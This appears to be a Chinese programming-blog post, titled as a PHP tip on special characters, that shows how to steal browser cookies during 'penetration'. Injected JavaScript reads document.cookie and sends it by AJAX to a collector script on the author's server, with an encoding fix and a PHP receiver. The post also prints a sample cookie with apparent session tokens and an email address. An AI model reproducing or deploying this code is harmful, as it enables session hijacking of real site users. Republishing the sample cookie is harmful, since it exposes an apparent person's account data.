欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  后端开发

Php提交包含特殊字符的参数的方法

程序员文章站 2022-04-06 20:05:10
...
在渗透的过程中,可以在网页中插入JS代码来获取cookiedocument.cookie

那么获取到的cookie如何传到我们自己的服务器呢?

在这里,我使用的是AJAX技术。但是Ajax有一个跨域的问题,所以需要再http头部再进行设置。这里主要讲cookie的提交。

先看一段JS代码:

xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+document.cookie,true);

这里将从网页获取到的cookie提交到receiveCookie.php上,其中cookie有一部分是这样的:

ULV=1450275143055:1:1:1:182.138.174.191_1450275139.121259:;SGUID=1450275146558_35957829; vjuids=-37098b091.151ab228f90.0.920dc7c7;vjlast=1450275148;SUP=cv%3D1%26bt%3D1450275168%26et%3D1450361568%26d%3D40c3%26i%3D2611%26us%3D1%26vf%3D0%26vt%3D0%26ac%3D2%26st%3D0%26lt%3D1%26uid%3D2277147785%26user%3D493354115%2540qq.com%26ag%3D4%26name%3D493354115%2540qq.com%26nick%3D%25E7%25BB%25BF%25E8%258C%25B66888%26sex%3D1%26ps%3D0%26email%3D%26dob%3D%26ln%3D493354115%2540qq.com%26os%3D%26fmp%3D%26lcp%3D;SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5o5Vidv35CH47We9hTzl.1; ALF=1481811169;

那么提交的过程中遇到特殊字符"%","&"等,就会自动解析,导致传参数错误。

解决的办法是:

var cookie = document.cookie;

cookie = escape(encodeURIComponent(cookie));

xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+cookie,true);

receiveCookie.php接收即可:

$cookie = $_GET["cookie"];

$cookie = (urldecode($cookie));

以上就介绍了Php提交包含特殊字符的参数的方法,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。